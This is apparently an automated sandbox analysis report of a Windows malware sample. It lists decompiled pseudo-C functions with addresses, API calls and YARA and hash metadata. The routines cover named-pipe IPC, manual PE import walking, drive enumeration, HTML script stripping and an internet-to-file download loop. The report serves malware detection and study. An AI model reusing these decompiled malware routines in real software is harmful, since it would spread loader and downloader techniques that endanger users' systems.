    • Instruction ID: c7dfa9fbdc4527b471979d489120e727493e09db6b3cb1932efc3a8aa03f3154
    • Opcode Fuzzy Hash: 7d97cf2f9fc47a91f4a1acfb98d1f74a0355a90613132ee1e7c696aae083b4e2
    • Instruction Fuzzy Hash: 99316D719001199BCB10AFA4EC84AEEB77CFF45354F12853AE925F22E1D7349D85CB98
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00411FA8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78sleepCOMMON
    Download Yara Rule
    C-Code - Quality: 83%
    			E00411FA8(void* __ecx, void* __edx) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t20;
				void* _t29;
				WCHAR** _t40;

				_t40 = 0x404270;
				_v24 = 2;
				do {
					_t20 = OpenMutexW(0x1f0001, 0,  *_t40);
					if(_t20 == 0) {
						goto L13;
					}
					CloseHandle(_t20);
					E00411E85( *_t40, 0xb,  &_v12);
					_t3 =  &_v16; // 0x40663a
					E00411E85( *_t40, 0xc, _t3);
					E00411E85( *_t40, 0xd,  &_v20);
					E00411E85( *_t40, 3, 0);
					_v5 = 0;
					while(1) {
						_t29 = OpenMutexW(0x1f0001, 0,  *_t40);
						if(_t29 == 0) {
							break;
						}
						CloseHandle(_t29);
						Sleep(0x3e8);
						_v5 = _v5 + 1;
						if(_v5 < 0xa) {
							continue;
						}
						L12:
						E0040F0C0(_v12);
						_t16 =  &_v16; // 0x40663a
						E0040F0C0( *_t16);
						_t20 = E0040F0C0(_v20);
						goto L13;
					}
					if(_v12 != 0) {
						E0040FFBF(_v12);
					}
					if(_v16 != 0) {
						_t12 =  &_v16; // 0x40663a
						E0040FFBF( *_t12);
					}
					if(_v20 != 0) {
						E0040FFBF(_v20);
					}
					goto L12;
					L13:
					_t40 =  &(_t40[1]);
					_t18 =  &_v24;
					 *_t18 = _v24 - 1;
				} while ( *_t18 != 0);
				return _t20;
			}











    0x00411fb1
    0x00411fb6
    0x00411fc4
    0x00411fc8
    0x00411fd0
    0x00000000
    0x00000000
    0x00411fd7
    0x00411fe5
    0x00411fea
    0x00411ff2
    0x00411fff
    0x00412009
    0x0041200e
    0x00412011
    0x00412015
    0x0041201d
    0x00000000
    0x00000000
    0x00412020
    0x0041202b
    0x00412031
    0x00412038
    0x00000000
    0x00000000
    0x00412063
    0x00412066
    0x0041206b
    0x0041206e
    0x00412076
    0x00000000
    0x00412076
    0x0041203f
    0x00412044
    0x00412044
    0x0041204c
    0x0041204e
    0x00412051
    0x00412051
    0x00412059
    0x0041205e
    0x0041205e
    0x00000000
    0x0041207b
    0x0041207b
    0x0041207e
    0x0041207e
    0x0041207e
    0x0041208b

    APIs
    • OpenMutexW.KERNEL32(001F0001,00000000,00404270,?,?,00000000), ref: 00411FC8
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411FD7
      • Part of subcall function 00411E85: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,00404270,00000000), ref: 00411EFE
      • Part of subcall function 00411E85: SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 00411F19
      • Part of subcall function 00411E85: WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411F38
      • Part of subcall function 00411E85: ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411F4E
      • Part of subcall function 00411E85: ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 00411F77
      • Part of subcall function 00411E85: CloseHandle.KERNEL32(00000000), ref: 00411F9B
      • Part of subcall function 00411E85: WaitNamedPipeW.KERNEL32(?,000000FF), ref: 00411EE6
    • OpenMutexW.KERNEL32(001F0001,00000000,00404270,00404270,00000003,00000000,00404270,0000000D,?,00404270,0000000C,:f@,00404270,0000000B,?), ref: 00412015
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00412020
    • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 0041202B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FileHandle$Close$MutexNamedOpenPipeRead$CreateSleepStateWaitWrite
    • String ID: :f@
    • API String ID: 2066843493-2479240421
    • Opcode ID: f2493c70b888b87518c15926ffd70129f0f26ccea873ab693eaf89c91049a9c4
    • Instruction ID: 4cdc0b95e9b26056b3b45938b87af851e94e5fa98b4ab3615a2187939c7bc9e9
    • Opcode Fuzzy Hash: f2493c70b888b87518c15926ffd70129f0f26ccea873ab693eaf89c91049a9c4
    • Instruction Fuzzy Hash: 17214A31940249FBDF216FD1DC85AEEBF79AF00344F14457BB640B10A2CBBA4A95DA58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00407351, Relevance: 10.6, APIs: 7, Instructions: 77stringCOMMON
    Download Yara Rule
    C-Code - Quality: 77%
    			E00407351(void* __eax, void* __edi, intOrPtr _a4) {
				int _t10;
				void* _t11;
				intOrPtr _t12;
				intOrPtr* _t23;
				int _t24;
				void* _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				void _t31;

				_t28 = __edi;
				_t29 = __eax;
				if(__eax != 0) {
					L8:
					_t26 = 0;
					if(IsBadHugeReadPtr(_t29, 0x14) != 0) {
						L16:
						_t10 = IsBadHugeReadPtr(_t29, 0x14);
						if(_t10 != 0 ||  *((intOrPtr*)(_t29 + 0xc)) == _t10) {
							L19:
							_t11 = 0;
							goto L20;
						} else {
							_t11 = _t29;
							L20:
							return _t11;
						}
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t12 =  *((intOrPtr*)(_t29 + 0xc));
						if(_t12 == 0) {
							break;
						}
						if(IsBadHugeReadPtr(_t12 + _t28, 2) == 0) {
							_push(_a4);
							_push( *((intOrPtr*)(_t29 + 0xc)) + _t28);
							_t26 = 0;
							if( *0x416edc() == 0) {
								goto L16;
							}
							L14:
							_t29 = _t29 + 0x14;
							if(IsBadHugeReadPtr(_t29, 0x14) == 0) {
								continue;
							}
							break;
						}
						_t26 = 1;
						goto L14;
					}
					if(_t26 != 0) {
						goto L19;
					}
					goto L16;
				}
				if(IsBadHugeReadPtr(__edi, 4) != 0 ||  *__edi != 0x5a4d) {
					L12:
					return 0;
				} else {
					_t23 =  *((intOrPtr*)(__edi + 0x3c)) + __edi;
					if( *_t23 != 0x4550) {
						goto L12;
					}
					_t30 = _t23 + 0x80;
					_t24 = IsBadHugeReadPtr(_t30, 8);
					if(_t24 != 0 ||  *((intOrPtr*)(_t30 + 4)) == _t24) {
						goto L12;
					} else {
						_t31 =  *_t30;
						if(_t31 == 0) {
							goto L12;
						}
						_t29 = __edi + _t31;
						goto L8;
					}
				}
			}













    0x00407351
    0x00407352
    0x00407356
    0x0040739c
    0x004073a0
    0x004073aa
    0x004073f4
    0x004073f7
    0x004073ff
    0x0040740a
    0x0040740a
    0x00000000
    0x00407406
    0x00407406
    0x0040740c
    0x00000000
    0x0040740c
    0x00000000
    0x00000000
    0x00000000
    0x004073ac
    0x004073ac
    0x004073ac
    0x004073b1
    0x00000000
    0x00000000
    0x004073c0
    0x004073cd
    0x004073d3
    0x004073d4
    0x004073de
    0x00000000
    0x00000000
    0x004073e0
    0x004073e2
    0x004073ee
    0x00000000
    0x00000000
    0x00000000
    0x004073ee
    0x004073c2
    0x00000000
    0x004073c2
    0x004073f2
    0x00000000
    0x00000000
    0x00000000
    0x004073f2
    0x00407363
    0x004073c6
    0x00000000
    0x0040736f
    0x00407372
    0x0040737a
    0x00000000
    0x00000000
    0x0040737c
    0x00407385
    0x0040738d
    0x00000000
    0x00407394
    0x00407394
    0x00407398
    0x00000000
    0x00000000
    0x0040739a
    0x00000000
    0x0040739a
    0x0040738d

    APIs
    • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 0040735B
    • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 00407385
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004073A2
    • IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 004073B8
    • lstrcmpi.KERNEL32(?,00000428), ref: 004073D6
    • IsBadHugeReadPtr.KERNEL32(-00000014,00000014), ref: 004073E6
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004073F7
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: HugeRead$lstrcmpi
    • String ID:
    • API String ID: 1912838836-0
    • Opcode ID: 932394fd2ad01b163ba3c38ad54b399c2d7e6bd9ccc14b9a706df5a70b0caa28
    • Instruction ID: b3a11823fff351b3f278041ecfecef13e10d357448b242704e0bdc62c3aba9ed
    • Opcode Fuzzy Hash: 932394fd2ad01b163ba3c38ad54b399c2d7e6bd9ccc14b9a706df5a70b0caa28
    • Instruction Fuzzy Hash: 60218131F496119BEB314B249C05BA73A98AF10B41B05C436ED45F62D1E778F811EBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00404CEE, Relevance: 10.6, APIs: 7, Instructions: 69threadsynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E00404CEE(intOrPtr* _a4) {
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				long _v24;
				short _t23;
				short _t24;
				int _t27;
				signed char _t33;
				intOrPtr* _t42;

				SetThreadPriority(GetCurrentThread(), 0xfffffff1);
				_t42 = _a4;
				while(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
					if( *0x416770 != 0) {
						_v24 = GetLogicalDrives();
						_t33 = 2;
						do {
							if((_v24 & 1 << _t33) == 0) {
								goto L7;
							} else {
								_v20 = (_t33 & 0x000000ff) + 0x41;
								_t23 = 0x3a;
								_v18 = _t23;
								_t24 = 0x5c;
								_v16 = _t24;
								_v14 = 0;
								_t27 = GetDriveTypeW( &_v20);
								if(_t27 == 3 || _t27 == 2) {
									E00404AB1( &_v20, _t42);
									if(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
										goto L7;
									}
								} else {
									goto L7;
								}
							}
							goto L9;
							L7:
							_t33 = _t33 + 1;
						} while (_t33 < 0x20);
					}
				}
				L9:
				 *_t42 =  *_t42 - 1;
				_push(0);
				return RtlExitUserThread();
			}













    0x00404d03
    0x00404d09
    0x00404d90
    0x00404d1a
    0x00404d22
    0x00404d26
    0x00404d28
    0x00404d35
    0x00000000
    0x00404d37
    0x00404d41
    0x00404d46
    0x00404d47
    0x00404d4e
    0x00404d4f
    0x00404d56
    0x00404d60
    0x00404d69
    0x00404d76
    0x00404d87
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00404d69
    0x00000000
    0x00404d89
    0x00404d89
    0x00404d8b
    0x00404d28
    0x00404d1a
    0x00404da2
    0x00404da2
    0x00404da4
    0x00404db2

    APIs
    • GetCurrentThread.KERNEL32 ref: 00404CFC
    • SetThreadPriority.KERNEL32(00000000), ref: 00404D03
    • GetLogicalDrives.KERNEL32 ref: 00404D1C
    • GetDriveTypeW.KERNEL32(?), ref: 00404D60
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 00404D7F
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 00404D94
    • RtlExitUserThread.NTDLL(00000000), ref: 00404DA6
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Thread$ObjectSingleWait$CurrentDriveDrivesExitLogicalPriorityTypeUser
    • String ID:
    • API String ID: 97270378-0
    • Opcode ID: c3d73f10137f0e52672fc25392028d378deea9845498f3d829f8cbe401306c3d
    • Instruction ID: fc0e1d1ab0f4fa922a2650a7a9b19b29ae3b4c7ec4a16f6bb5fd70055552e30a
    • Opcode Fuzzy Hash: c3d73f10137f0e52672fc25392028d378deea9845498f3d829f8cbe401306c3d
    • Instruction Fuzzy Hash: 3411D2752443009BD720AF65FC09AAB77A8EFC4721F11853BF959D22E0D734C845CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405647, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 145COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00405647(intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t52;
				intOrPtr _t57;
				signed int _t58;
				void* _t61;
				void* _t66;
				void* _t69;
				char _t71;
				int _t72;
				void* _t76;
				void* _t77;
				intOrPtr _t80;
				char* _t82;
				intOrPtr _t84;
				void* _t86;

				_t71 = 0;
				_t84 = _a8;
				_v16 = 0;
				_v6 = 0;
				_v20 = 0;
				_v12 = 0;
				if(_t84 <= 0) {
					L43:
					return _v12 - _t71 + _t84;
				} else {
					do {
						_t80 = _a4;
						if(_v16 == 0 ||  *((char*)(_t71 + _t80)) != 0x3e) {
							_t52 =  *((intOrPtr*)(_t71 + _t80));
							if(_t52 != 0x3c) {
								if(_v16 != 0 || _v6 != 0 || _t52 == 0xd || _t52 == 0xa || _t52 == 9) {
									goto L41;
								} else {
									if(_t52 != 0x26 || _t84 - _t71 <= 5) {
										L39:
										 *((char*)(_v12 + _t80)) =  *((intOrPtr*)(_t71 + _t80));
										goto L40;
									} else {
										_t38 = _t80 + 1; // 0x1
										if(StrCmpNIA(_t71 + _t38, "nbsp;", 5) != 0) {
											goto L39;
										}
										 *((char*)(_v12 + _t80)) = 0x20;
										_t71 = _t71 + 5;
										L40:
										_v12 = _v12 + 1;
										goto L41;
									}
								}
							}
							_t57 = _v16;
							_v16 = _v16 + 1;
							if(_t57 != 0) {
								goto L41;
							}
							_t86 = _t84 - _t71;
							_t16 = _t80 + 1; // 0x1
							_t82 = _t71 + _t16;
							if(_v6 == _t57) {
								if(_t86 <= 6) {
									L21:
									_v5 = 0;
									do {
										_t58 = _v5 & 0x000000ff;
										_t22 = _t58 + 0x401dc4; // 0x2020202
										_t72 =  *_t22 & 0x000000ff;
										if(_t86 <= _t72) {
											goto L27;
										}
										if(StrCmpNIA(_t82,  *(0x401db4 + _t58 * 4), _t72) != 0) {
											_t61 = 0;
										} else {
											_t61 = E00405626(_t82, _t72);
										}
										if(_t61 != 0) {
											_t30 =  &(("\n\n\n script")[_v5 & 0x000000ff]); // 0x200a0a0a
											_t71 = _v20;
											 *((char*)(_v12 + _a4)) =  *_t30;
											goto L40;
										}
										L27:
										_v5 = _v5 + 1;
									} while (_v5 < 4);
									_t71 = _v20;
									goto L41;
								}
								if(StrCmpNIA(_t82, "script", 6) != 0) {
									_t66 = 0;
								} else {
									_t76 = 6;
									_t66 = E00405626(_t82, _t76);
								}
								if(_t66 == 0) {
									goto L21;
								} else {
									_v6 = 1;
									goto L41;
								}
							}
							if(_t86 > 7 &&  *_t82 == 0x2f) {
								_t83 =  &(_t82[1]);
								if(StrCmpNIA( &(_t82[1]), "script", 6) != 0) {
									_t69 = 0;
								} else {
									_t77 = 6;
									_t69 = E00405626(_t83, _t77);
								}
								if(_t69 != 0) {
									_v6 = 0;
								}
							}
						} else {
							_v16 = _v16 - 1;
						}
						L41:
						_t84 = _a8;
						_t71 = _t71 + 1;
						_v20 = _t71;
					} while (_t71 < _t84);
					goto L43;
				}
			}






















    0x0040564e
    0x00405651
    0x00405654
    0x00405657
    0x0040565a
    0x0040565d
    0x00405662
    0x004057d9
    0x004057e3
    0x00405668
    0x00405669
    0x0040566d
    0x00405670
    0x00405680
    0x00405685
    0x0040577c
    0x00000000
    0x00405790
    0x00405792
    0x004057bd
    0x004057c3
    0x00000000
    0x0040579b
    0x004057a2
    0x004057af
    0x00000000
    0x00000000
    0x004057b4
    0x004057b8
    0x004057c6
    0x004057c6
    0x00000000
    0x004057c6
    0x00405792
    0x0040577c
    0x0040568b
    0x0040568e
    0x00405693
    0x00000000
    0x00000000
    0x00405699
    0x0040569b
    0x0040569b
    0x004056a2
    0x004056eb
    0x0040571a
    0x0040571a
    0x0040571e
    0x0040571e
    0x00405722
    0x00405722
    0x0040572b
    0x00000000
    0x00000000
    0x0040573f
    0x0040574c
    0x00405741
    0x00405745
    0x00405745
    0x00405750
    0x00405764
    0x00405770
    0x00405773
    0x00000000
    0x00405773
    0x00405752
    0x00405752
    0x00405755
    0x0040575b
    0x00000000
    0x0040575b
    0x004056fd
    0x0040570b
    0x004056ff
    0x00405703
    0x00405704
    0x00405704
    0x0040570f
    0x00000000
    0x00405711
    0x00405711
    0x00000000
    0x00405711
    0x0040570f
    0x004056a7
    0x004056bd
    0x004056c7
    0x004056d5
    0x004056c9
    0x004056cd
    0x004056ce
    0x004056ce
    0x004056d9
    0x004056df
    0x004056df
    0x004056d9
    0x00405678
    0x00405678
    0x00405678
    0x004057c9
    0x004057c9
    0x004057cc
    0x004057cd
    0x004057d0
    0x00000000
    0x004057d8

    APIs
    • StrCmpNIA.SHLWAPI(00000002,script,00000006), ref: 004056BF
    • StrCmpNIA.SHLWAPI(00000001,script,00000006), ref: 004056F5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID: nbsp;$script
    • API String ID: 0-298180595
    • Opcode ID: b77c40d9cd3fb344f928d64a7ec8ee8ad9b7bfa879dccbca399a53e4cf986c86
    • Instruction ID: 5fb57be4e081e896d7329a8a17290d86395438bb232dd772598f98f21d70b562
    • Opcode Fuzzy Hash: b77c40d9cd3fb344f928d64a7ec8ee8ad9b7bfa879dccbca399a53e4cf986c86
    • Instruction Fuzzy Hash: 8551D534E04B49EADF214EA984847AFBF71EB01704F0444BBD991773C2C23EA946AF59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004146B2, Relevance: 9.1, APIs: 6, Instructions: 124fileCOMMON
    Download Yara Rule
    C-Code - Quality: 78%
    			E004146B2(void** __esi, WCHAR* _a4) {
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v33;
				void _v36;
				long _v40;
				char _v41;
				void* _t38;
				int _t50;
				int _t51;
				signed int _t53;
				int _t54;
				int _t57;
				signed int _t60;
				signed int _t61;
				struct _OVERLAPPED* _t65;
				struct _OVERLAPPED* _t69;
				void** _t72;

				_t72 = __esi;
				_push(_t60);
				_t69 = 0;
				_v33 = 0;
				_t38 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 2, 0);
				_t61 = _t60 | 0xffffffff;
				 *__esi = _t38;
				if(_t38 != _t61) {
					_push( &_v12);
					_push(_t38);
					if( *0x416e90() == 0) {
						_v28 = _t61;
						_v24 = _t61;
					} else {
						_v28 = _v20;
						_v24 = _v16;
					}
					if((_v28 & _v24) == _t61) {
						L7:
						CloseHandle( *_t72);
						 *_t72 =  *_t72 | 0xffffffff;
					} else {
						if((_v28 | _v24) == 0) {
							L21:
							_t72[2] = _t72[2] | 0xffffffff;
							_t34 =  &(_t72[3]);
							 *_t34 = _t72[3] | 0xffffffff;
							__eflags =  *_t34;
							_v41 = 1;
							E0040FF6F( *_t72, _t69, _t69, _t69);
						} else {
							_v20 = _t69;
							_v16 = _t69;
							if(ReadFile( *_t72,  &_v36, 5,  &_v40, _t69) != 0) {
								while(1) {
									__eflags = _v40 - _t69;
									if(_v40 == _t69) {
										goto L21;
									}
									__eflags = _v40 - 5;
									if(_v40 != 5) {
										L19:
										_t50 = E0040FF6F( *_t72, _v20, _v16, _t69);
										__eflags = _t50;
										if(_t50 == 0) {
											goto L7;
										} else {
											_t51 = SetEndOfFile( *_t72);
											__eflags = _t51;
											if(_t51 == 0) {
												goto L7;
											} else {
												goto L21;
											}
										}
									} else {
										_t53 = _v36 ^ _t72[4];
										asm("adc edi, [esp+0x24]");
										_t65 = _t53 + _v20 + 5;
										asm("adc edi, ecx");
										_v36 = _t53;
										__eflags = 0 - _v24;
										if(__eflags > 0) {
											L18:
											_t69 = 0;
											__eflags = 0;
											goto L19;
										} else {
											if(__eflags < 0) {
												L14:
												__eflags = _t53 - 0xa00000;
												if(_t53 > 0xa00000) {
													goto L18;
												} else {
													_t54 = E0040FF6F( *_t72, _t53, 0, 1);
													__eflags = _t54;
													if(_t54 == 0) {
														goto L7;
													} else {
														_v20 = _t65;
														_v16 = 0;
														_t57 = ReadFile( *_t72,  &_v36, 5,  &_v40, 0);
														__eflags = _t57;
														if(_t57 != 0) {
															_t69 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L7;
														}
													}
												}
											} else {
												__eflags = _t65 - _v28;
												if(_t65 > _v28) {
													goto L18;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L22;
								}
								goto L21;
							} else {
								goto L7;
							}
						}
					}
				}
				L22:
				return _v33;
			}























    0x004146b2
    0x004146bb
    0x004146bd
    0x004146cf
    0x004146d4
    0x004146da
    0x004146dd
    0x004146e1
    0x004146eb
    0x004146ec
    0x004146f5
    0x00414709
    0x0041470d
    0x004146f7
    0x004146fb
    0x00414703
    0x00414703
    0x0041471b
    0x0041474c
    0x0041474e
    0x00414754
    0x0041471d
    0x00414725
    0x00414802
    0x00414802
    0x00414806
    0x00414806
    0x00414806
    0x0041480f
    0x00414814
    0x0041472b
    0x0041473a
    0x0041473e
    0x0041474a
    0x0041475e
    0x0041475e
    0x00414762
    0x00000000
    0x00000000
    0x00414768
    0x0041476d
    0x004147da
    0x004147e5
    0x004147ea
    0x004147ec
    0x00000000
    0x004147f2
    0x004147f4
    0x004147fa
    0x004147fc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004147fc
    0x0041476f
    0x00414773
    0x00414780
    0x00414784
    0x00414787
    0x00414789
    0x0041478d
    0x00414791
    0x004147d8
    0x004147d8
    0x004147d8
    0x00000000
    0x00414793
    0x00414793
    0x0041479b
    0x0041479b
    0x004147a0
    0x00000000
    0x004147a2
    0x004147a8
    0x004147ad
    0x004147af
    0x00000000
    0x004147b1
    0x004147c1
    0x004147c5
    0x004147c9
    0x004147cf
    0x004147d1
    0x0041475c
    0x0041475c
    0x00000000
    0x004147d3
    0x00000000
    0x004147d3
    0x004147d1
    0x004147af
    0x00414795
    0x00414795
    0x00414799
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00414799
    0x00414793
    0x00414791
    0x00000000
    0x0041476d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041474a
    0x00414725
    0x0041471b
    0x00414819
    0x00414822

    APIs
    • CreateFileW.KERNEL32 ref: 004146D4
    • GetFileSizeEx.KERNEL32(00000000,C0000000), ref: 004146ED
    • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000), ref: 00414742
    • CloseHandle.KERNEL32(?), ref: 0041474E
    • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000,?,?,00000000,00000001), ref: 004147C9
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 004147F4
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Read$CloseCreateHandleSize
    • String ID:
    • API String ID: 1850650832-0
    • Opcode ID: 14906b5284d1beb1fa14635eaf3ca3d388e40013574e3d3340364b11de167299
    • Instruction ID: 21e87901e1bdae4b6255ca3af2cedf3ec0c0e1c0502f74571127a0e8c178393f
    • Opcode Fuzzy Hash: 14906b5284d1beb1fa14635eaf3ca3d388e40013574e3d3340364b11de167299
    • Instruction Fuzzy Hash: 58417830108341AFD720DF25CC85AABBBE4FBC9764F154A2EF5E4922A0D735D985CB1A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040FE88, Relevance: 9.1, APIs: 6, Instructions: 81fileCOMMON
    Download Yara Rule
    C-Code - Quality: 42%
    			E0040FE88(signed int __eax, void* __ecx, void** __esi, WCHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* _t29;
				void* _t30;
				void* _t33;
				signed int _t34;
				void* _t37;
				void* _t38;
				signed int _t41;
				signed int _t43;

				_t52 = __esi;
				_t41 = __eax;
				asm("sbb eax, eax");
				_t29 = CreateFileW(_a4, (__eax | 0xfffffffe) << 0x1e,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t29;
				if(_t29 == 0xffffffff) {
					L10:
					_t30 = 0;
					__eflags = 0;
				} else {
					_push( &_v12);
					_push(_t29);
					if( *0x416e90() == 0 || _v8 != 0) {
						L9:
						CloseHandle(_t52[2]);
						goto L10;
					} else {
						_t33 = _v12;
						__esi[1] = _t33;
						if(_t33 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_t34 = 0;
							_t43 = _t41 & 0x00000001;
							_t37 = CreateFileMappingW(__esi[2], 0, (_t34 & 0xffffff00 | __eflags != 0x00000000) + (_t34 & 0xffffff00 | __eflags != 0x00000000) + 2, ??, ??, ??);
							__esi[3] = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								goto L9;
							} else {
								__eflags = _t43;
								_t38 = MapViewOfFile(_t37, (_t43 == 0) + (_t43 == 0) + 2, 0, 0, 0);
								 *__esi = _t38;
								__eflags = _t38;
								if(_t38 != 0) {
									goto L5;
								} else {
									CloseHandle(__esi[3]);
									goto L9;
								}
							}
						} else {
							__esi[3] = 0;
							 *__esi = 0;
							L5:
							_t30 = 1;
						}
					}
				}
				return _t30;
			}













    0x0040fe88
    0x0040fe8e
    0x0040fe9c
    0x0040feb4
    0x0040feba
    0x0040fec0
    0x0040ff39
    0x0040ff39
    0x0040ff39
    0x0040fec2
    0x0040fec5
    0x0040fec6
    0x0040fecf
    0x0040ff30
    0x0040ff33
    0x00000000
    0x0040fed6
    0x0040fed6
    0x0040fed9
    0x0040fede
    0x0040fee9
    0x0040feea
    0x0040feeb
    0x0040feee
    0x0040feef
    0x0040fefe
    0x0040ff04
    0x0040ff07
    0x0040ff09
    0x00000000
    0x0040ff0b
    0x0040ff0d
    0x0040ff1b
    0x0040ff21
    0x0040ff23
    0x0040ff25
    0x00000000
    0x0040ff27
    0x0040ff2a
    0x00000000
    0x0040ff2a
    0x0040ff25
    0x0040fee0
    0x0040fee0
    0x0040fee3
    0x0040fee5
    0x0040fee5
    0x0040fee5
    0x0040fede
    0x0040fecf
    0x0040ff3e

    APIs
    • CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,0041AFD6,?,?,?,0040438B,00416538,025DF908,00000006), ref: 0040FEB4
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000,00000000), ref: 0040FEC7
    • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000), ref: 0040FEFE
    • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000,00000000), ref: 0040FF1B
    • CloseHandle.KERNEL32(?,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000,00000000), ref: 0040FF2A
    • CloseHandle.KERNEL32(?,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000,00000000), ref: 0040FF33
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$CloseCreateHandle$MappingSizeView
    • String ID:
    • API String ID: 2246244431-0
    • Opcode ID: ecb667aaed588f2cb9041de2881a880e26c6dc590171f2096879721f38bb4087
    • Instruction ID: 1d072c1fbab7f138804053e7a7537862a4b02da2011a2d725e0d063e08521f89
    • Opcode Fuzzy Hash: ecb667aaed588f2cb9041de2881a880e26c6dc590171f2096879721f38bb4087
    • Instruction Fuzzy Hash: A521CD75110201AFC7304F66DC4DD6BBBF8EB967107158A3EF056C26A0E6B5D845CA24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040FB9A, Relevance: 9.1, APIs: 6, Instructions: 74filesynchronizationnetworkCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040FB9A(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E0040F0A8(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) {
						E0040FFBF(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E0040F0C0(_v20);
				goto L13;
			}











    0x0040fbb7
    0x0040fbc0
    0x0040fbc5
    0x0040fc65
    0x0040fc6b
    0x0040fc6b
    0x0040fbd0
    0x0040fbd5
    0x0040fbda
    0x0040fc51
    0x0040fc52
    0x0040fc5b
    0x0040fc60
    0x0040fc60
    0x00000000
    0x0040fc5b
    0x0040fbdc
    0x0040fbdf
    0x0040fc0c
    0x00000000
    0x00000000
    0x0040fc11
    0x0040fc3f
    0x0040fc45
    0x00000000
    0x0040fc45
    0x0040fc27
    0x00000000
    0x00000000
    0x0040fc29
    0x0040fc2f
    0x00000000
